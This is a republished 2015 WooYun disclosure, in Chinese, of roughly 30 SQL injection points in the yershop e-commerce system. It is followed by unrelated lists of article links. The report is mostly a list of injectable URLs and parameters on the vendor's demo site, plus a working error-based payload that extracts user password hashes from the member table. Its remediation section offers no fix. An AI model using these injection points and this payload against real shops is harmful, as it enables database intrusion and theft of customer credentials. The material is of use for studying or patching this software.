yershop商城系統30處sql注入
漏洞詳情
披露狀態:
2015-08-10: 細節已通知廠商而且等待廠商處理中
2015-08-15: 廠商主動忽略漏洞,細節向第三方安全合做夥伴開放
2015-10-09: 細節向核心白帽子及相關領域專家公開
2015-10-19: 細節向普通白帽子公開
2015-10-29: 細節向實習白帽子公開
2015-11-13: 細節向公衆公開
php
簡要描述:
有回顯,非盲,無視gpc,tp框架,安裝環境php5.3以上,官網demo演示html
詳細說明:
http://demo.yershop.com/index.php?s=/Home/account/savepaykey.html
post:uid=1'
http://demo.yershop.com/index.php?s=/home/article/comment
post:goodid=1'
http://demo.yershop.com/index.php?s=/home/article/commentgood
post:goodid=1'
http://demo.yershop.com/index.php?s=/home/article/commentmiddle
post:goodid=1'
http://demo.yershop.com/index.php?s=/home/article/commentworse
post:goodid=1'
http://demo.yershop.com/index.php?s=/Home/center/shezhi //下面的須要登陸
post:id=1'
http://demo.yershop.com/index.php?s=/Home/center/deleteAddress.html
post:id=1'
http://demo.yershop.com/index.php?s=/home/order/detail/id/1'
http://demo.yershop.com/index.php?s=/home/order/cancel/id/1'
http://demo.yershop.com/index.php?s=/home/order/canceldetail/id/1'
http://demo.yershop.com/index.php?s=/home/order/backdetail/id/1'
http://demo.yershop.com/index.php?s=/home/order/changedetail/id/1'
http://demo.yershop.com/index.php?s=/home/order/wuliu/orderid/1
http://demo.yershop.com/index.php?s=/home/order/back/
post:id=1'
http://demo.yershop.com/index.php?s=/home/order/backkuaidi/
post:backid=1'
http://demo.yershop.com/index.php?s=/home/order/change/
post:id=1'
http://demo.yershop.com/index.php?s=/home/order/changekuaidi/
post:backid=1'
http://demo.yershop.com/index.php?s=/home/order/complete/id/1'
http://demo.yershop.com/index.php?s=/home/pay/index/orderid/1'
http://demo.yershop.com/index.php?s=/home/pay/chongzhi/orderid/1'
http://demo.yershop.com/index.php?s=/home/service/index/id/1'
http://demo.yershop.com/index.php?s=/home/shopcart/addItem/
post:id=1'&i=1'
http://demo.yershop.com/index.php?s=/home/shopcart/addgood/
post:id=1'
http://demo.yershop.com/index.php?s=/home/shopcart/createorder/
post:tag=1'
http://demo.yershop.com/index.php?s=/home/shopcart/delItemByuid/
post:sort=1'
http://demo.yershop.com/index.php?s=/home/shopcart/getPricetotal/tag/1'
http://demo.yershop.com/index.php?s=/home/shopcart/getpriceNum/id/1'
http://demo.yershop.com/index.php?s=/home/user/checkcode/
post:couponid=1'
http://demo.yershop.com/index.php?s=/home/user/getcoupon/
post:couponid=1'
http://demo.yershop.com/index.php?s=/home/user/cut/id/1'
下面給出一個payload:
http://demo.yershop.com/index.php?s=/home/article/comment
goodid=1') and extractvalue(1, concat(0x5c, (select a.password from (select tmp.* from yershop_ucenter_member tmp limit 1)a) ) )%23web
漏洞證實:
修復方案:
給我小禮物我就告訴大家,保證給力!安全
版權聲明:轉載請註明來源 不能忍@烏雲
漏洞迴應
廠商迴應:
危害等級:無影響廠商忽略框架
忽略時間:2015-11-13 10:59post
廠商回覆:
漏洞Rank:4 (WooYun評價)ui
最新狀態:
暫無spa
- 1. 前端商城系統
- 2. springboot商城系統(源碼)
- 3. 商城系統有哪些?
- 4. 樂購商城系統
- 5. 商城系統概述
- 6. 商城管理系統
- 7. NiuShop開源商城系統
- 8. 美食城用什麼商城系統?
- 9. 開源B2c商城-小程序商城-商城APP-開源商城-星然雲商城系統
- 10. 如何入駐多商戶商城系統
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • Docker容器實戰(七) - 容器眼光下的文件系統
- • YAML 入門教程
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. 升級Gradle後報錯Gradle‘s dependency cache may be corrupt (this sometimes occurs
- 2. Smarter, Not Harder
- 3. mac-2019-react-native 本地環境搭建(xcode-11.1和android studio3.5.2中Genymotion2.12.1 和VirtualBox-5.2.34 )
- 4. 查看文件中關鍵字前後幾行的內容
- 5. XXE萌新進階全攻略
- 6. Installation failed due to: ‘Connection refused: connect‘安卓studio端口占用
- 7. zabbix5.0通過agent監控winserve12
- 8. IT行業UI前景、潛力如何?
- 9. Mac Swig 3.0.12 安裝
- 10. Windows上FreeRDP-WebConnect是一個開源HTML5代理,它提供對使用RDP的任何Windows服務器和工作站的Web訪問
- 1. 前端商城系統
- 2. springboot商城系統(源碼)
- 3. 商城系統有哪些?
- 4. 樂購商城系統
- 5. 商城系統概述
- 6. 商城管理系統
- 7. NiuShop開源商城系統
- 8. 美食城用什麼商城系統?
- 9. 開源B2c商城-小程序商城-商城APP-開源商城-星然雲商城系統
- 10. 如何入駐多商戶商城系統